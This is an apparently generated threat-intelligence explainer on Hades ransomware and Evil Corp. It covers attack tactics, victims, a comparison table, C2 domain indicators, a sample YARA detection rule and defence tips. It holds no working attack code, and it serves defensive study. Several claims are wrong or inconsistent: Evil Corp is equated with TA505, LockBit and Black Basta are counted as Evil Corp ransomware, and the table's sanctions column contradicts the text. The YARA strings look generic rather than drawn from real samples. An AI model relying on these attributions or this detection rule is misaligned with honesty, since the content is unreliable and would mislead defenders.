# **Hades Malware ā€“ Ransomware by Evil Corp** šŸ’€šŸ’» **Hades ransomware** is a **highly targeted ransomware strain** attributed to **Evil Corp (TA505)**. It emerged in **late 2020** as a **rebranded version of WastedLocker**, likely to evade **U.S. sanctions** imposed on Evil Corp. Unlike mass-distributed ransomware, **Hades focuses on big corporations** for **multi-million-dollar ransom demands** and often includes **double extortion tactics**. --- ## **šŸ”¹ Key Facts About Hades** - **First Seen:** December 2020 - **Threat Actor:** **Evil Corp (TA505)** - **Primary Targets:** Large enterprises, **manufacturing, logistics, healthcare, retail** - **Attack Method:** Phishing, credential theft, and custom payloads - **Ransom Demand:** Typically in the **millions** of dollars - **Notable Victims:** **Forward Air (2020), European corporations (2021)** šŸšØ **Hades is NOT the same as Hades APT (Chinese cyber espionage group)** ā€“ different actors! --- ## **šŸ”¹ Notable Hades Ransomware Attacks** |**Attack**|**Description**|**Target**|**Year**| |---|---|---|---| |**Forward Air Attack**|Logistics firm suffered operational disruption & extortion attempt|U.S. logistics|2020| |**Undisclosed Manufacturing Companies**|Multiple European firms targeted for multimillion-dollar ransoms|Manufacturing sector|2021| |**Healthcare Sector Attacks**|Hospitals and healthcare firms hit with double extortion|U.S. & EU healthcare|2021| šŸ“Œ **Why These Targets?** ā€“ Evil Corp focuses on high-revenue industries that **can't afford downtime**, increasing ransom payment likelihood. --- ## **šŸ”¹ Hades Malware Analysis & Tactics** ### **1ļøāƒ£ Initial Access (How It Spreads)** - **Spear-phishing emails** with **malicious attachments** - **Compromised RDP servers** (brute-force & credential stuffing) - **Fake software installers** - **Exploiting vulnerabilities in VPNs, remote access tools** ### **2ļøāƒ£ Execution & Lateral Movement** - Uses **PowerShell scripts & Cobalt Strike** for execution - Deploys **Mimikatz** to steal credentials - **Disables security tools (AV, EDR)** - Moves laterally through **SMB, PsExec, RDP abuse** ### **3ļøāƒ£ Data Theft & Ransomware Deployment** - **Exfiltrates sensitive data** before encryption (double extortion) - Encrypts local & network files using **AES-256 & RSA-2048** - Drops **ransom note** instructing victims to contact attackers via **Tor-based chat** ### **4ļøāƒ£ Impact & Extortion** - Encrypts systems, making recovery impossible without payment - Threatens to **leak stolen data** on dark web leak sites - Demands **millions in Bitcoin** for decryption --- ## **šŸ”¹ Hades vs Other Evil Corp Ransomware** |**Feature**|**WastedLocker**|**Hades**|**LockBit 3.0 (Affiliate Use)**| |---|---|---|---| |**Actor**|Evil Corp|Evil Corp|Mixed Groups (Possibly Evil Corp)| |**Targeting**|U.S. Corporations|U.S. & EU Companies|Global| |**Ransom Method**|High-Value Targets|High-Value Targets|Mass Ransomware-as-a-Service (RaaS)| |**Sanctions Evasion?**|āŒ No|āœ… Yes|āœ… Yes| šŸšØ **Why the rebrand?** ā€“ After the **2019 U.S. Treasury sanctions** on Evil Corp, **companies were legally restricted from paying them**. Hades was likely a way to **bypass these restrictions**. --- ## **šŸ”¹ Indicators of Compromise (IOCs)** ### **File Hashes (SHA-256)** [Samples vary ā€“ real IOCs should be gathered from threat intelligence feeds] Network Indicators C2 Domains: hadesransom[.]top decryptyourdata[.]com Tor Communication Links YARA Rule Example for Hades Ransomware rule Hades_Ransomware { meta: description = "Detects Hades ransomware samples" author = "Threat Research" date = "2021-01-15" strings: $a = "Hades Ransomware" wide ascii $b = "AES-256 encryption" wide ascii $c = "decryptyourdata" ascii condition: any of them } šŸ”¹ How to Defend Against Hades āœ… Block Macros & Disable PowerShell Execution āœ… Enforce MFA on RDP & VPN access āœ… Monitor for abnormal SMB, RDP, and PsExec usage āœ… Use EDR solutions to detect Cobalt Strike & Mimikatz activity āœ… Regularly back up data & keep backups offline šŸ”¹ Current Status: Is Hades Still Active? šŸ”„ Yes, but under new branding! Since late 2021, Hades has faded from the spotlight, and Evil Corp is suspected of using LockBit & Black Basta ransomware to avoid U.S. sanctions.